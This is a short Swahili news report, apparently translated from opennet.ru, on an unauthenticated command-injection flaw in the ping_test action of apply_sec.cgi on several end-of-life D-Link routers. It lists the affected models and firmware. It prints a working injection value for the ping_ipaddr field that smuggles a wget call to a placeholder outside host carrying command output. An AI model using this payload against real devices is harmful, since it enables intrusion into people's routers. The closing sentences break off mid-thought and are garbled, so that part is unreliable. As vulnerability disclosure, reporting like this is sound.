Katika vipanga njia vya wireless vya D-Link
Inashangaza, kwa mujibu wa watengenezaji wa firmware, simu ya "ping_test" inapaswa kutekelezwa tu baada ya uthibitishaji, lakini kwa kweli inaitwa kwa hali yoyote, bila kujali kuingia kwenye interface ya mtandao. Hasa, wakati wa kufikia hati ya apply_sec.cgi na kupitisha kigezo cha "action=ping_test", hati inaelekeza upya kwenye ukurasa wa uthibitishaji, lakini wakati huo huo hufanya kitendo kinachohusishwa na ping_test. Ili kutekeleza msimbo, athari nyingine ilitumika katika ping_test yenyewe, ambayo huita huduma ya ping bila kuangalia vizuri usahihi wa anwani ya IP iliyotumwa kwa majaribio. Kwa mfano, kupiga simu shirika la wget na kuhamisha matokeo ya amri ya "echo 1234" kwa mwenyeji wa nje, taja tu kigezo "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Uwepo wa mazingira magumu umethibitishwa rasmi katika mifano ifuatayo:
- DIR-655 na firmware 3.02b05 au zaidi;
- DIR-866L na firmware 1.03b04 au zaidi;
- DIR-1565 na firmware 1.01 au zaidi;
- DIR-652 (hakuna taarifa kuhusu matoleo yenye matatizo ya programu-jalizi yanayotolewa)
Muda wa usaidizi wa miundo hii tayari umekwisha, kwa hivyo D-Link
Baadaye iligunduliwa kuwa hatari pia ilikuwa
Chanzo: opennet.ru